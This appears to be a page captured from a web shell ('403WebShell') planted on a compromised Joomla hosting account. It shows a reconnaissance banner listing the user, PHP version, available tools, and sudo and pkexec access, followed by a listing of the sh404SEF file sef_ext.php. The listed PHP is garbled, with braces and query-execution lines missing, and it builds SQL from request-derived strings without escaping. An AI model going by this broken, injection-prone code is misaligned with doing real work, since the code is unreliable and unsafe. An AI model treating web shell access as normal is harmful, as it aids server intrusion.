%PDF- %PDF- 403WebShell
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User : 1stforcarhirealicante.com ( 296923)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/cwd/components/com_sh404sef/

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Current File : /proc/thread-self/cwd/components/com_sh404sef/sef_ext.php
 * SEF module for Joomla!
 * Originally written for Mambo as 404SEF by W. H. Welch.
 * @author      $Author: shumisha $
 * @copyright   Yannick Gaultier - 2009
 * @package     sh404SEF-15
 * @license     http://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @version     $Id: sef_ext.php 866 2009-01-17 14:05:21Z silianacom-svn $

// Security check to ensure this file is being included by a parent file.
if (!defined('_JEXEC')) die('Direct Access to this location is not allowed.');

global $_SEF_SPACE, $lowercase;
class sef_component

  function revert (&$url_array, $pos)
    global $_SEF_SPACE;

    $QUERY_STRING = '';
    $url_array = array_filter($url_array); // V x : traling slash can cause empty array element

    if (strcspn ($url_array[1], ',') == strlen($url_array[1])) {
      // This is a nocache url
      $x = 0;
      $c = count($url_array);
      while ($x < $c) {
        if (isset($url_array[$x]) && $url_array[$x] != '' && isset($url_array[$x + 1]) && $url_array[$x + 1] != '') {
          $QUERY_STRING .= '&'.$url_array[$x].'='.$url_array[$x + 1];
        $x += 2;
    else {
      //This is a default mambo SEF url for a component
      foreach($url_array as $value) {
        $temp = explode(",", $value);
        if (isset($temp[0]) && $temp[0] != '' && isset($temp[1]) && $temp[1]!="") {
          $QUERY_STRING .= "&$temp[0]=$temp[1]";

    //return str_replace("&option","option",$QUERY_STRING);
    return ltrim($QUERY_STRING, '&');

class sef_content

  function revert (&$url_array, $pos)
  { // V 1.2.4.l  // updated based on includes/sef.php.
    $url_array = array_filter($url_array); // V x : traling slash can cause empty array element
    $uri 				= explode('content/', $_SERVER['REQUEST_URI']);
    $option 			= 'com_content';
    $pos 				= array_search ('content', $url_array);

    // language hook for content
    $lang = '';
    foreach($url_array as $key=>$value) {
      if ( !strcasecmp(substr($value,0,5),'lang,') ) {
        $temp = explode(',', $value);
        if (isset($temp[0]) && $temp[0] != '' && isset($temp[1]) && $temp[1] != '') {
          $lang 				= $temp[1];

    if (isset($url_array[$pos+8]) && $url_array[$pos+8] != '' && in_array('category', $url_array) && ( strpos( $url_array[$pos+5], 'order,' ) !== false ) && ( strpos( $url_array[$pos+6], 'filter,' ) !== false ) ) {
      // $option/$task/$sectionid/$id/$Itemid/$order/$filter/$limit/$limitstart
      $task 					= $url_array[$pos+1];
      $sectionid				= $url_array[$pos+2];
      $id 					= $url_array[$pos+3];
      $Itemid 				= $url_array[$pos+4];
      $order 					= str_replace( 'order,', '', $url_array[$pos+5] );
      $filter					= str_replace( 'filter,', '', $url_array[$pos+6] );
      $limit 					= $url_array[$pos+7];
      $limitstart 			= $url_array[$pos+8];

      $QUERY_STRING = "option=com_content&task=$task&sectionid=$sectionid&id=$id&Itemid=$Itemid&order=$order&filter=$filter&limit=$limit&limitstart=$limitstart";
    } else if (isset($url_array[$pos+7]) && $url_array[$pos+7] != '' && $url_array[$pos+5] > 1000 && ( in_array('archivecategory', $url_array) || in_array('archivesection', $url_array) ) ) {
      // $option/$task/$id/$limit/$limitstart/year/month/module
      $task 					= $url_array[$pos+1];
      $id						= $url_array[$pos+2];
      $limit 					= $url_array[$pos+3];
      $limitstart 			= $url_array[$pos+4];
      $year 					= $url_array[$pos+5];
      $month 					= $url_array[$pos+6];
      $module					= $url_array[$pos+7];

      $QUERY_STRING = "option=com_content&task=$task&id=$id&limit=$limit&limitstart=$limitstart&year=$year&month=$month&module=$module";
    } else if (isset($url_array[$pos+7]) && $url_array[$pos+7] != '' && $url_array[$pos+6] > 1000 && ( in_array('archivecategory', $url_array) || in_array('archivesection', $url_array) ) ) {
      // $option/$task/$id/$Itemid/$limit/$limitstart/year/month
      $task 					= $url_array[$pos+1];
      $id						= $url_array[$pos+2];
      $Itemid 				= $url_array[$pos+3];
      $limit 					= $url_array[$pos+4];
      $limitstart 			= $url_array[$pos+5];
      $year 					= $url_array[$pos+6];
      $month 					= $url_array[$pos+7];

      $QUERY_STRING = "option=com_content&task=$task&id=$id&Itemid=$Itemid&limit=$limit&limitstart=$limitstart&year=$year&month=$month";
    } else if (isset($url_array[$pos+7]) && $url_array[$pos+7] != '' && in_array('category', $url_array) && ( strpos( $url_array[$pos+5], 'order,' ) !== false )) {
      // $option/$task/$sectionid/$id/$Itemid/$order/$limit/$limitstart
      $task 					= $url_array[$pos+1];
      $sectionid				= $url_array[$pos+2];
      $id 					= $url_array[$pos+3];
      $Itemid 				= $url_array[$pos+4];
      $order 					= str_replace( 'order,', '', $url_array[$pos+5] );
      $limit 					= $url_array[$pos+6];
      $limitstart 			= $url_array[$pos+7];

      $QUERY_STRING = "option=com_content&task=$task&sectionid=$sectionid&id=$id&Itemid=$Itemid&order=$order&limit=$limit&limitstart=$limitstart";
    } else if (isset($url_array[$pos+6]) && $url_array[$pos+6] != '') {
      // $option/$task/$sectionid/$id/$Itemid/$limit/$limitstart
      $task 					= $url_array[$pos+1];
      $sectionid				= $url_array[$pos+2];
      $id 					= $url_array[$pos+3];
      $Itemid 				= $url_array[$pos+4];
      $limit 					= $url_array[$pos+5];
      $limitstart 			= $url_array[$pos+6];

      $QUERY_STRING = "option=com_content&task=$task&sectionid=$sectionid&id=$id&Itemid=$Itemid&limit=$limit&limitstart=$limitstart";
    } else if (isset($url_array[$pos+5]) && $url_array[$pos+5] != '') {
      // $option/$task/$id/$Itemid/$limit/$limitstart
      $task 					= $url_array[$pos+1];
      $id 					= $url_array[$pos+2];
      $Itemid 				= $url_array[$pos+3];
      $limit 					= $url_array[$pos+4];
      $limitstart 			= $url_array[$pos+5];

      $QUERY_STRING = "option=com_content&task=$task&id=$id&Itemid=$Itemid&limit=$limit&limitstart=$limitstart";
    } else if (isset($url_array[$pos+4]) && $url_array[$pos+4] != '' && ( in_array('archivecategory', $url_array) || in_array('archivesection', $url_array) )) {
      // $option/$task/$year/$month/$module
      $task 					= $url_array[$pos+1];
      $year 					= $url_array[$pos+2];
      $month 					= $url_array[$pos+3];
      $module 				= $url_array[$pos+4];

      $QUERY_STRING = "option=com_content&task=$task&year=$year&month=$month&module=$module";
    } else if (!(isset($url_array[$pos+5]) && $url_array[$pos+5] != '') && isset($url_array[$pos+4]) && $url_array[$pos+4] != '') {
      // $option/$task/$sectionid/$id/$Itemid
      $task 					= $url_array[$pos+1];
      $sectionid 				= $url_array[$pos+2];
      $id 					= $url_array[$pos+3];
      $Itemid 				= $url_array[$pos+4];

      $QUERY_STRING = "option=com_content&task=$task&sectionid=$sectionid&id=$id&Itemid=$Itemid";
    } else if (!(isset($url_array[$pos+4]) && $url_array[$pos+4] != '') && (isset($url_array[$pos+3]) && $url_array[$pos+3] != '')) {
      // $option/$task/$id/$Itemid
      $task 					= $url_array[$pos+1];
      $id 					= $url_array[$pos+2];
      $Itemid 				= $url_array[$pos+3];

      $QUERY_STRING = "option=com_content&task=$task&id=$id&Itemid=$Itemid";
    } else if (!(isset($url_array[$pos+3]) && $url_array[$pos+3] != '') && (isset($url_array[$pos+2]) && $url_array[$pos+2] != '')) {
      // $option/$task/$id
      $task 					= $url_array[$pos+1];
      $id 					= $url_array[$pos+2];

      $QUERY_STRING = "option=com_content&task=$task&id=$id";
    } else if (!(isset($url_array[$pos+2]) && $url_array[$pos+2] != '') && (isset($url_array[$pos+1]) && $url_array[$pos+1] != '')) {
      // $option/$task
      $task = $url_array[$pos+1];
      $QUERY_STRING = 'option=com_content&task='. $task;

    if ($lang!='') {
      $QUERY_STRING .= '&amp;lang='. $lang;

    return 	$QUERY_STRING;


class sef_404

  function create($string, &$vars, &$shAppendString, $shLanguage, $shSaveString = '')
  // V 1.2.4.j shAppendString will be added to sef url, but not saved in DB or cache
    $sefConfig = & shRouter::shGetConfig();
    // get DB
    $database =& JFactory::getDBO();
    _log('Calling sef404 create function with '. $string);
    if ($sefConfig->shInsertGlobalItemidIfNone && !empty($GLOBALS['Itemid'])) {  // V 1.2.4.t
      $shCurrentItemid =  $GLOBALS['Itemid'];
    } else $shCurrentItemid = null;
    $index = str_replace($GLOBALS['shConfigLiveSite'], '', $_SERVER['PHP_SELF']);
    $base  = dirname($index);
    $base .= ($base == '/') ? '' : '/';

    if (isset($title))  // V 1.2.4.r : protect against components using 'title' as GET vars (com_jim for instance)
    $sh404SEF_title = $title;  // means that $sh404SEF_title has to be used in plugins or extensions
    $title = array();  // V 1.2.4.r

    // Plug-in system.
    $shDoNotOverride = in_array( str_replace('com_', '', $option), $sefConfig->shDoNotOverrideOwnSef);

    // look first in component own /sef_ext/ dir for a com_component_name.php plugin file
    if ((shFileExists(sh404SEF_ABS_PATH.'components/'.$option.'/sef_ext/'.$option.'.php'))
    && ($shDoNotOverride                   // and param said do not override
    || (!$shDoNotOverride              // or param said override, but we don't have a plugin
    && !shFileExists(sh404SEF_ABS_PATH
    .'components/com_sh404sef/sef_ext/'.$option.'.php'))  )) {
      // Load the plug-in file.
      _log('Loading component own sh404SEF plugin');
    // then look for sh404SEF own plugin
    else if (shFileExists(sh404SEF_ABS_PATH.'components/com_sh404sef/sef_ext/'.$option.'.php')) {
      _log('Loading built-in plugin');
    // else if no plugin nowhere default to Joomla own sef
    else {
    		_log('Falling back to sefGetLocation');
    		if (empty($sefConfig->defaultComponentStringList[str_replace('com_', '', $option)]))
    		$title[] = getMenuTitle($option, (isset($task) ? @$task : null), null, null, $shLanguage );
    		else $title[] = $sefConfig->defaultComponentStringList[str_replace('com_', '', $option)];
    		if ($title[0] != '/') $title[] = '/';  // V 1.2.4.q getMenuTitle can now return '/'
    		if (count($title) > 0) {
    		  // V 1.2.4.q use $shLanguage insted of $lang  (lang name rather than lang code)
    		  $string = sef_404::sefGetLocation($string, $title, (isset($task) ? @$task : null), (isset($limit) ? @$limit : null), (isset($limitstart) ? @$limitstart : null), (isset($shLanguage) ? @$shLanguage : null));

    return $string;

  function revert(&$url_array, $pos)
    $sefConfig = & shRouter::shGetConfig();

    // get DB
    $database =& JFactory::getDBO();

    $QUERY_STRING ='';
    $req = str_replace('option/','',implode('/',$url_array));
    if ($req != '/') $req = ltrim($req, '/'); // V x
    $req = str_replace("//","/",$req);
    _log('sef404 reverting URL : '.$req);
    $sql="SELECT oldurl, newurl FROM #__redirection WHERE oldurl = '".$req."' ORDER BY rank ASC LIMIT 1"; // V 1.2.4.q
    // V 1.2.4.s
    $row = $database->loadObject();
    if ($row) {
      // use the cached url
      $string = $row->newurl;
      _log('sef404 reverting URL : found : '.$row->newurl);
      // update the count
      $database->setQuery("UPDATE #__redirection SET cpt=(cpt+1) WHERE `newurl` = '".$row->newurl."' AND `oldurl` = '".$row->oldurl."'");  // V 1.2.4.q
      $string = str_replace( '&amp;', '&', $string );
      $QUERY_STRING= str_replace('index.php?','',$string);
    return $QUERY_STRING;

  function getContentTitles($view,$id, $layout, $Itemid=0, $shLang = null)  // V 1.2.4.q can force language
    global $shMosConfig_locale;
    $sefConfig = & shRouter::shGetConfig();
    // get DB
    $database =& JFactory::getDBO();
    $title = array();
    $shLang = empty($shLang) ? $shMosConfig_locale : $shLang;
    $sql = '';
    $catField = $sefConfig->useCatAlias ? 'alias' : 'title';
    $secField = $sefConfig->useSecAlias ? 'alias' : 'title';
    switch ($view) {
      case 'section':
        if (empty($layout) || $layout != 'blog') {
          $shTemp = getMenuTitle( null, $view, (isset($Itemid) ? @$Itemid : null), '', $shLang);
          if ($sefConfig->shInsertContentTableName)
          if (!empty($sefConfig->shContentTableName))
          $title[] = $sefConfig->shContentTableName;
          if (!empty($shTemp)) $title[] = $shTemp;
          if (!empty($id)){
            $sql = "SELECT " . $secField. " AS section".(shTranslateURL('com_content', $shLang)?',id':'')." FROM #__sections WHERE id=$id";
            if ($secField != 'title') {
              $database->setQuery( $sql);
              $sa = $database->loadResult();
              if (empty( $sa)) {
                $secField = 'title';
          } else {
            if (!$sefConfig->shInsertContentTableName || !empty($sefConfig->shContentTableName))
            if (!empty($shTemp)) $title[] = $shTemp;
        }else {  // blog section
          $shTemp = getMenuTitle( null, $view, (isset($Itemid) ? @$Itemid : null), '', $shLang); // v 1.2.4.t
          if ($sefConfig->shInsertContentBlogName)
          if (!empty($sefConfig->shContentBlogName))
          $title[] = $sefConfig->shContentBlogName;
          if (!empty($shTemp)) $title[] = $shTemp;
          if (!empty($id)){
            $sql = "SELECT " . $secField . " AS section".(shTranslateURL('com_content', $shLang)?',id':'')." FROM #__sections WHERE id=$id";
            if ($secField != 'title') {
              $database->setQuery( $sql);
              $sa = $database->loadResult();
              if (empty( $sa)) {
                $secField = 'title';
          } else {
            if (!$sefConfig->shInsertContentBlogName || !empty($sefConfig->shContentBlogName))
            if (!empty($shTemp)) $title[] = $shTemp;
      case 'category':  // V 1.2.4.s added instead of inserting /Table
        if (empty($layout) || $layout != 'blog') {
          $shTemp = getMenuTitle( null, $view, (isset($Itemid) ? @$Itemid : null), '', $shLang);
          if ($sefConfig->shInsertContentTableName) {
            if (!empty($sefConfig->shContentTableName)) {
              $title[] = $sefConfig->shContentTableName;
            } else {
              if (!empty($shTemp)) $title[] = $shTemp;
          if (!empty($id)){ // V x : apply ShowSection param
            if ($sefConfig->ShowSection == true && SH404SEF_COMPAT_SHOW_SECTION_IN_CAT_LINKS) {
              // V 1.2.4.m if displaying a category or a category blog
              $sql = 'SELECT s.' . $secField . ' AS section'.(shTranslateURL('com_content', $shLang)?',s.id AS secid ':'').', c.' . $catField . ' AS category'
              .(shTranslateURL('com_content', $shLang)?',c.id as catid':'') .' FROM #__categories as c '.
							'LEFT JOIN #__sections AS s '.
							'ON c.section=s.id '.
							'WHERE c.id='.$id;
              $sql = "SELECT " . $catField . " AS category".(shTranslateURL('com_content', $shLang)?',id':'')." FROM #__categories WHERE id=$id";
              if ($catField != 'title') {
                $database->setQuery( $sql);
                $sa = $database->loadResult();
                if (empty( $sa)) {
                  $catField = 'title';
          } else {
            if (!$sefConfig->shInsertContentTableName || !empty($sefConfig->shContentTableName))
            if (!empty($shTemp)) $title[] = $shTemp;
        } else {  // blog category
          $shTemp = getMenuTitle( null, $view, (isset($Itemid) ? @$Itemid : null), '',  $shLang); // V 1.2.4.t
          if ($sefConfig->shInsertContentBlogName)
          if (!empty($sefConfig->shContentBlogName))
          $title[] = $sefConfig->shContentBlogName;
          if (!empty($shTemp)) $title[] = $shTemp;
          if (!empty($id)){  // if several cat in blogcategory, then id==0, so we don't get in here
            // V 1.2.4.m if displaying a category or a category blog, we now disregard the
            // $sefConfig->ShowCat param, as this would cause issue if set to false
            if ($sefConfig->ShowSection == true) {
              // V 1.2.4.m if displaying a category or a category blog
              $sql = "SELECT s." . $secField . " AS section".(shTranslateURL('com_content', $shLang)?',s.id AS secid ':'').", c." . $catField . " AS category".(shTranslateURL('com_content', $shLang)?',c.id as catid':'') ." FROM #__categories as c ".
							"LEFT JOIN #__sections AS s ".
							"ON c.section=s.id ".
							"WHERE c.id=$id";
              $sql = "SELECT " . $catField . " AS category".(shTranslateURL('com_content', $shLang)?',id':'')." FROM #__categories WHERE id=$id";
              if ($catField != 'title') {
                $database->setQuery( $sql);
                $sa = $database->loadResult();
                if (empty( $sa)) {
                  $catField = 'title';
          } else { // V 1.2.4.m if blogcategory with more than one category, then use getMenuTitle() instead
            if (!$sefConfig->shInsertContentBlogName || !empty($sefConfig->shContentBlogName))
            if (!empty($shTemp)) $title[] = $shTemp;
      case 'article':
        if (!empty($id)){
          if ($sefConfig->UseAlias == true) {
            // verify title alias is not empty
            $database->setQuery("SELECT alias".(shTranslateURL('com_content', $shLang)?',id':'')." FROM #__content WHERE id=$id");
            if ($ta = $database->loadResult())
            $title_field = "alias";
            $title_field = "title";
            $title_field = "title";
          if (($sefConfig->ShowSection == true)||($sefConfig->ShowCat == false)) {
            $sql ="SELECT ".(($sefConfig->ShowSection == true) ? "s." . $secField . " AS section".(shTranslateURL('com_content', $shLang)?',s.id AS secid, ':', '):"" )." ".
            (($sefConfig->ShowCat == false) ? "":"c." . $catField . " AS category".(shTranslateURL('com_content', $shLang)?',c.id AS catid':'').', ' )." a.".$title_field." AS title".(shTranslateURL('com_content', $shLang)?',a.id as id':'')." FROM #__content as a ".
							"LEFT JOIN #__sections AS s ".
							"ON a.sectionid=s.id ".
							"LEFT JOIN #__categories AS c ".
							"ON a.catid=c.id ".
							"WHERE a.id=$id"; 
            $sql ="SELECT ".(($sefConfig->ShowCat == false) ? "":"c." . $catField . " AS category".(shTranslateURL('com_content', $shLang)?',c.id AS catid':'').", " )." a.".$title_field." AS title".(shTranslateURL('com_content', $shLang)?',a.id as id':'')." FROM #__content as a ".
							"LEFT JOIN #__categories AS c ".
							"ON a.catid=c.id ".
							"WHERE a.id=$id";
      case 'frontpage' :  // J 1.5 new view, com_frontpage deprecated. Processed in com_content SEF plugin
      default :
        $sql ='';
    if ($sql) {
      $row = null;
      $shLangCode = $shLang;
      if (isset($shLang) && shIsMultilingual()) { // V 1.2.4.q  can force language
        $row = $database->loadObject(true, $shLangCode);
      } else {
        $row = $database->loadObject( );
      if (isset($row->section)) {
        $title[] = $row->section;
      if (isset($row->category)) {
        $title[] = $row->category;
      if (isset($row->title)) $title[] = $row->title;
    if ($view == 'section') $title[] = "/";
    if ($view == 'category') $title[] = "/";
    return $title;

   * Vul in de array $title de onderdelen waaruit de link moet bestaan
   * Bijvoorbeeld: menuitem, categorie, itemnaam
   * Deze functie last de boel aan elkaar
   * @param  string $url
   * @param  array $title
   * @param  string $task
   * @param  int $limit
   * @param  int $limitstart
   * @return sefurl
  function sefGetLocation($url, &$title, $task = null, $limit = null, $limitstart = null, $langParam = null, $showall = null)
    GLOBAL $shMosConfig_locale, $option, $shHomeLink;
    $sefConfig = & shRouter::shGetConfig();
    // get DB
    $database =& JFactory::getDBO();

    $lang = empty($langParam) ? $shMosConfig_locale : $langParam;
    // V 1.2.4.k added homepage check : needed in case homepage is not com_frontpage
    if (empty($shHomeLink)) {
      $menu =& shRouter::shGetMenu();
      $shHomePage = & $menu->getDefault();
      if ($shHomePage) {
        if ( (substr( $shHomePage->link, 0, 9) == 'index.php')  // if link on homepage is a local page
        && (!preg_match( '/Itemid=[0-9]*/', $shHomePage->link))) {  // and it does not have an Itemid
          $shHomePage->link .= ($shHomePage->link == 'index.php' ? '?':'&').'Itemid='.$shHomePage->id;  // then add itemid
        $shHomeLink = $shHomePage->link;
        //$shHomeLink = 'index.php';
        if (!strpos($shHomeLink,'lang=')) {
          $shDefaultIso = shGetIsoCodeFromName(shGetDefaultLang());
          $shSepString = (substr($shHomeLink, -9) == 'index.php' ? '?':'&');
          $shHomeLink .= $shSepString.'lang='.$shDefaultIso;
        $shHomeLink = shSortUrl($shHomeLink);  // $homeLink has lang info, whereas $homepage->link may or may not
    // shumisha : try to avoid duplicate content when using Joomfish by always adding &lang=xx to url (stored in DB).
    // warning : must add &lang=xx only if it does not exists already, which happens for the joomfish language selection modules or search results
    if (!strpos($url,'lang=')) {
      $shSepString = (substr($url, -9) == 'index.php' ? '?':'&');
      $url.= $shSepString.'lang='.shGetIsoCodeFromName($lang);
    // shumisha end of fix
    //shorten the url for storage and for consistancy
    $url = str_replace( '&amp;', '&', $url );

    // V 1.2.4.q detect multipage homepage
    $shMultiPageHomePageFlag = shIsHomepage($url);

    // get all the titles ready for urls
    $location = array();
    foreach($title as $titlestring) {      // V 1.2.4.t removed array_filter as it prevents '0' values in URL
      $location[] = titleToLocation($titlestring);
    $location = implode("/", $location); // V 1.2.4.t
    // V 1.2.4.t remove duplicate /
    $location = preg_replace('/\/{2,}/', '/', $location);
    $location = substr( $location, 0, sh404SEF_MAX_SEF_URL_LENGTH); // trim to max length V 1.2.4.t
    // shumisha protect against querying for empty location
    if (empty($location))  // V 1.2.4.t
    if ((!shIsMultilingual() || (shIsMultilingual() && shIsDefaultlang($lang))) && !$sefConfig->addFile
    && !$shMultiPageHomePageFlag) // V 1.2.4.q : need to go further and add pagination
    return ''; // if location is empty, and no Joomfish, or Joomfish but this is default language, then there is nothing to add to url before querying DB
    // shumisha end of change
    //check for non-sef url first and avoid repeative lookups
    //we only want to look for title variations when adding new
    //this should also help eliminate duplicates.
    // shumisha 2003-03-13 added URL Caching
    $realloc = '';
    $urlType = shGetSefURLFromCache($url, $realloc);
    if ($urlType == sh404SEF_URLTYPE_NONE || $urlType == sh404SEF_URLTYPE_404) {  // V 1.2.4.t
      // shumisha end of addition
      $realloc = false;
      if ($urlType == sh404SEF_URLTYPE_NONE) {
        $query = "SELECT oldurl from #__redirection WHERE newurl = '".$url."'";
        //if ($realloc = $database->loadResult()) {
        if ($shTemp = $database->loadObject())
        $realloc = $shTemp->oldurl;
      if ($realloc) {
        // found a match, so we aredone
        //Dat betekent dus, dat de functie create(), slecht gekozen is
        // shumisha : removed this die() that I do not understand!
        //die('regel292 in sef_ext.php');
        // shumisha end of removal
      else {
        // this is new, so we need to insert the new title.
        //Hier worden eindelijk de nieuwe links gemaakt
        $iteration = 1;
        $realloc = false;
        $prev_temploc = '';

        do {
          // temploc is $location, unless we're on a second or greater iteration,
          // then its $location.$iteration
          if (!empty($location))
          $shSeparator = (substr($location, -1) == '/') ? '':'/';
          else $shSeparator = '';

          $temploc = shAddPaginationInfo( $limit, $limitstart, $showall, $iteration, $url, $location, $shSeparator); // v 1.2.4.t
          // V 1.2.4.t
          if ($shMultiPageHomePageFlag && ('/'.$temploc == $location)    // if homepage
          && ( !shIsMultilingual()       // and no Joomfish
          || ( shIsMultilingual()       // or Joomfish
          && shIsDefaultLang($lang))) ) {  // but this is default language
            // this is start page of multipage homepage, return home or forced home
            if (!empty($sefConfig->shForcedHomePage))  // V 1.2.4.t
            return str_replace($GLOBALS['shConfigLiveSite'].'/', '',$sefConfig->shForcedHomePage);
            return '';

          // V 1.2.4.k here we need to check for other-than-default-language homepage
          // remove lang
          $v1 = shCleanUpLang( $url); // V 1.2.4.t
          $v2 = shCleanUpLang( $shHomeLink); // V 1.24.t
          if ($v1 == $v2 || $v1 == 'index.php') {  // check if this is homepage

            if (shIsMultilingual() && !shIsDefaultLang($lang))   // V 1.2.4.m : insert language code based on param
            $temploc = shGetIsoCodeFromName($lang).'/';
            else $temploc = '';  // if homepage in not-default-language, then add language code even if param says opposite
            // as we otherwise would not be able to switch language on the frontpage
          } else

          if (shInsertIsoCodeInUrl($option, $lang)) {  // V 1.2.4.m : insert language code based on param
            // V 1.2.4.q : pass URL lang info, as may not be current lang
            $temploc = shGetIsoCodeFromName($lang).'/'.$temploc;   // V 1.2.4.q  must be forced lang, not default

          if ($temploc != '') {
            // see if we have a result for this location
            // V 1.2.4.r without mod_rewrite
            $temploc = shAdjustToRewriteMode($temploc);
            $sql =  "SELECT id, newurl, rank, dateadd FROM #__redirection WHERE oldurl = '".$temploc
            ."' ORDER BY rank ASC"; // V 1.2.4.q
            if ($iteration > 9999) {
              JError::raiseError(500, 'Too many pages :'.$temploc.'##' );
            $dburl = null; // V 1.2.4.t initialize $dburl to avoid notices error if cache disabled
            $dbUrlId = null; // V 1.2.4.t
            $urlType = sh404SEF_URLTYPE_NONE;
            // shumisha 2007-03-13 added URL caching, check for various URL for same content
            if ($sefConfig->shUseURLCache)
            $urlType = shGetNonSefURLFromCache($temploc, $dburl);
            $newMaxRank = 0;
            $shDuplicate = false;
            if ($sefConfig->shRecordDuplicates || $urlType == sh404SEF_URLTYPE_NONE) {  // V 1.2.4.s
              $dbUrlList = $database->loadObjectList();
              if (count($dbUrlList) > 0) {
                $dburl = $dbUrlList[0]->newurl;
                $dbUrlId = $dbUrlList[0]->id;
                if (empty($dburl)) {  // V 1.2.4.t url was found in DB, but was a 404
                  $urlType = sh404SEF_URLTYPE_404;
                } else {
                  $newMaxRank = $dbUrlList[count($dbUrlList)-1]->rank+1;
                  $urlType = $dbUrlList[0]->dateadd == '0000-00-00' ?
                  sh404SEF_URLTYPE_AUTO : sh404SEF_URLTYPE_CUSTOM;
            if ($urlType != sh404SEF_URLTYPE_NONE && $urlType != sh404SEF_URLTYPE_404) {
              if ($dburl == $url) {
                // found the matching object
                // it probably should have been found sooner
                // but is checked again here just for CYA purposes
                // and to end the loop
                $realloc = $temploc;
              } else $shDuplicate = true;
              // else, didn't find it, increment and try again
              // shumisha added this to close the loop if working on frontpage
              // as domain.tld/index.php?lang=xx and domain.tld/index.php?option=com_frontpage&Itemid=1&lang=xx both must end up in domain.tld/xx/ (if xx is not default language of course - in that case, they must endup in domain.tld)
              // this is true also if Joomfish is not installed and there is no language information in the url
              // V 1.2.4.q  this is a duplicate so we must indert it with incremented rank;
              if ($shDuplicate && $sefConfig->shRecordDuplicates) {
                shAddSefUrlToDBAndCache( $url, $temploc, ($shDuplicate?$newMaxRank:0), $urlType);
              $realloc = $temploc; // to close the loop
              // shumisha end of addition
            } else {
              //title not found, chechk 404
              if ($sefConfig->shLog404Errors) { // V 1.2.4.m
                if ($urlType == sh404SEF_URLTYPE_404 && !empty($dbUrlId)) {  // we already have seen that it is a 404
                  $id = $dbUrlId; // V 1.2.4.t
                } elseif ($urlType == sh404SEF_URLTYPE_404) {
                  $query = "SELECT `id` FROM #__redirection WHERE `oldurl` = '$temploc' AND `newurl` = ''";
                  $id = $database->loadResult();
                } else $id = null;
              } else $id = null;  // V 1.2.4.m if we are not logging 404 errors, then no need to check for
              // previous hit of this page.
              if (!empty($id)) {
                // V 1.2.4.q : need to update dateadd to 0, as otherwise this redir will be seen as a custom redir
                // this makes all such 404 errors 'disappear' from the 404 log, but no other solution
                $query = "UPDATE #__redirection SET `newurl` = '".
                addslashes(urldecode($url))."',`dateadd` = '0000-00-00' WHERE `id` = '$id'";
                if (!$database->query()) {
                } else shAddSefURLToCache( $url, $temploc, sh404SEF_URLTYPE_AUTO); // v 1.2.4.t
              } else {
                /* put it in the database */
                shAddSefUrlToDBAndCache( $url, $temploc, 0, sh404SEF_URLTYPE_AUTO);
              $realloc = $temploc;
          $prev_temploc = $temploc;
          // shumisha allow loop exit if $temploc = '' (homepage)
          //} while (!$realloc);
        } while ((!$realloc) && ($temploc != ''));
    } // shumisha : enf of check if URL is in cache
    return $realloc;

  function getcategories($catid, $shLang = null)

    $sefConfig = & shRouter::shGetConfig();
    // get DB
    $database =& JFactory::getDBO();
    $title = ''; // V 1.2.4.q
    $shLang = empty($shLang) ? $shMosConfig_locale : $shLang;
    if (isset($catid) && $catid != 0){
      $query = 'SELECT title'.(shTranslateURL('com_content', $shLang)?',id':'').' FROM #__categories WHERE id = "'.$catid.'"';
      $rows = $database->loadObjectList( );
      if ($database->getErrorNum()) {
        die( $database->stderr());
      }elseif( @count( $rows ) > 0 ){
        if( !empty( $rows[0]->title ) ){
          $title = $rows[0]->title;
    return $title;


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